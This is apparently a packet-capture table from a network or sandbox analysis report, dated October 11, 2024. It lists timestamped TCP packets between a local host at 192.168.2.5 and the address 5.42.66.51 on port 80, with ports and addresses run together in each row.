                                                                                                Oct 11, 2024 20:37:47.660331964 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.660424948 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.665771008 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.855566025 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.860405922 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.861673117 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.862186909 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.867006063 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.936352968 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.936409950 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.019743919 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.025084972 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.025105000 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.025122881 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.216985941 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.221824884 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.221914053 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.372127056 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.451143026 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.509737968 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.543601990 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.638654947 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.638699055 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.670655012 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.747997046 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.931586981 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.931770086 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.932434082 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.937486887 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.937553883 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.937841892 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.938436985 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.938502073 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.938988924 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.939043999 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.942590952 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.311574936 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316498995 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316555977 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316567898 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316576004 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316581964 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316629887 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316631079 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316644907 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316658974 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316699982 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316803932 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316843033 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316862106 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316888094 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.316901922 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.316936970 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.321727991 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321794033 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.321844101 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321857929 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321870089 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321883917 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321894884 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.321896076 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.321917057 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.322002888 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.364238977 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.364404917 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.412256956 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.412329912 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.464262962 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.464402914 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.512271881 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.512351036 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.560477018 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.560558081 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.608239889 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.608299017 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.656424999 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.656486034 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.697901964 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.702785015 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.702863932 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.704236984 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.704282999 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.704802036 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.709723949 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.752317905 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.752384901 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.800334930 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.800385952 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.852319002 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.852411032 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.900317907 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.900366068 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.948287010 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.948352098 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:49.996223927 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:49.996272087 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.044251919 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.044317007 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.081835985 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.086728096 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.086895943 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.092222929 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.092346907 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.140456915 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.140516043 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.188254118 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.189208031 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.236336946 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.236416101 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.284305096 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.284389973 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.538903952 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.538968086 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.539520025 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.546231031 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.546289921 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.557661057 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.557724953 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.596276045 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.596406937 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.644275904 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.644386053 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.696320057 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.696614027 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.744498968 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.744617939 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.792237997 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:50.792356014 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:50.846565962 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.610474110 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.610946894 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.616506100 CEST80499025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.616556883 CEST4990280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.616633892 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.616704941 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.616833925 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.621761084 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.966861963 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:51.971815109 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:51.972127914 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:52.320821047 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:52.419903040 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:52.451277971 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:52.529267073 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:53.486780882 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:53.487291098 CEST4992680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:53.493957996 CEST80499135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:53.494019032 CEST4991380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:53.494098902 CEST80499265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:53.494209051 CEST4992680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:53.494677067 CEST4992680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:53.499439001 CEST80499265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:53.841883898 CEST4992680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:53.846857071 CEST80499265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:53.846956968 CEST80499265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:54.191994905 CEST80499265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:54.248188972 CEST4992680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:54.328022957 CEST80499265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:54.435547113 CEST4992680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:55.362817049 CEST4992680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:55.363148928 CEST4994080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:55.368174076 CEST80499265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:55.368186951 CEST80499405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:55.368237019 CEST4992680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:55.368300915 CEST4994080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:55.368527889 CEST4994080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:55.373518944 CEST80499405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:55.757078886 CEST4994080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:55.762237072 CEST80499405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:55.762248039 CEST80499405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:56.080323935 CEST80499405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:56.212604046 CEST80499405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:56.212714911 CEST4994080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:57.221404076 CEST4994080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:57.222016096 CEST4995180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:57.226962090 CEST80499405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:57.227130890 CEST4994080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:57.227643967 CEST80499515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:57.227730989 CEST4995180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:57.227875948 CEST4995180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:57.232812881 CEST80499515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:57.576585054 CEST4995180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:57.581593037 CEST80499515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:57.581619978 CEST80499515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:57.937397003 CEST80499515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:58.044884920 CEST4995180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:58.053499937 CEST80499515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:58.247997046 CEST4995180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:58.422046900 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:58.627657890 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:58.748016119 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:59.067414999 CEST4995180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:59.067706108 CEST4996680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:59.072824001 CEST80499665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.072899103 CEST4996680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:59.073103905 CEST4996680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:59.073174953 CEST80499515.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.073311090 CEST4995180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:59.078682899 CEST80499665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.343909025 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.351190090 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:59.356318951 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.419977903 CEST4996680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:59.425178051 CEST80499665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.425297976 CEST80499665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.562632084 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.594516993 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:59.599577904 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.599610090 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.599675894 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:59.968358040 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:00.138838053 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:00.188373089 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:00.188637018 CEST4997480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:00.193592072 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:00.193646908 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:00.193734884 CEST80499745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:00.193819046 CEST4997480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:00.193919897 CEST4997480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:00.198684931 CEST80499745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:00.890161037 CEST4997480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:00.895226955 CEST80499745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:00.895253897 CEST80499745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:00.895397902 CEST80499745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:02.753798962 CEST80499665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:02.884623051 CEST80499665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:02.884696960 CEST4996680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:03.889027119 CEST80499745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:03.970750093 CEST4996680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:03.971014023 CEST4999580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:03.976084948 CEST80499665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:03.976176977 CEST4996680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:03.976634026 CEST80499955.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:03.976706028 CEST4999580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:03.976974964 CEST4999580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:03.982839108 CEST80499955.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.029275894 CEST4997480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.036119938 CEST80499745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.232431889 CEST4997480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.329658985 CEST4999580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.334742069 CEST80499955.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.334943056 CEST80499955.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.423180103 CEST4997480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.423358917 CEST5000180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.429049015 CEST80500015.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.429147959 CEST5000180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.429490089 CEST80499745.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.429687023 CEST4997480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.443034887 CEST5000180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.449285984 CEST80500015.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.671448946 CEST80499955.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.732424021 CEST4999580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.796629906 CEST5000180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:04.801609039 CEST80500015.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.801635027 CEST80500015.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.801667929 CEST80500015.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.813133001 CEST80499955.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:04.892028093 CEST4999580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:05.169455051 CEST80500015.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:05.248028040 CEST5000180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:05.832597017 CEST5000180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:05.832648993 CEST4999580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:05.832823992 CEST5000280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:05.837852001 CEST80500015.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:05.837909937 CEST5000180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:05.837946892 CEST80500025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:05.838007927 CEST5000280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:05.838279963 CEST5000280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:05.838567019 CEST80499955.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:05.838613033 CEST4999580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:05.844072104 CEST80500025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:06.188448906 CEST5000280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:06.193566084 CEST80500025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:06.193579912 CEST80500025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:06.560077906 CEST80500025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:06.623019934 CEST5000280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:06.695538044 CEST80500025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:06.912292957 CEST80500025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:06.912343025 CEST5000280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.285845995 CEST5000280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.286254883 CEST5000380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.291416883 CEST80500025.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:08.291476011 CEST5000280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.293742895 CEST80500035.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:08.293838024 CEST5000380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.295085907 CEST5000380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.300343990 CEST80500035.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:08.301187992 CEST5000480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.306349993 CEST80500045.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:08.306418896 CEST5000480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.308618069 CEST5000480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.313667059 CEST80500045.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:08.654562950 CEST5000380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.654586077 CEST5000480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:08.659871101 CEST80500035.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:08.659888029 CEST80500035.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:08.659900904 CEST80500035.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:08.659984112 CEST80500045.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:08.660079956 CEST80500045.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:09.007503033 CEST80500035.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:09.138165951 CEST80500035.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:09.138216972 CEST5000380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:09.266599894 CEST5000380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:09.266882896 CEST5000580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:09.272311926 CEST80500035.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:09.272414923 CEST5000380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:09.272536993 CEST80500055.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:09.272634983 CEST5000580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:09.272782087 CEST5000580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:09.278335094 CEST80500055.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:09.623225927 CEST5000580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:09.628561020 CEST80500055.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:09.628619909 CEST80500055.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:09.628757000 CEST80500055.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:09.964113951 CEST80500055.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:10.029284000 CEST5000580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:10.093425035 CEST80500055.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:10.232399940 CEST5000580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:11.838263035 CEST5000580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:11.838706017 CEST5000680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:11.843725920 CEST80500065.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:11.843810081 CEST5000680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:11.843872070 CEST80500055.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:11.843935013 CEST5000580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:11.869066000 CEST5000680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:11.874226093 CEST80500065.42.66.51192.168.2.5
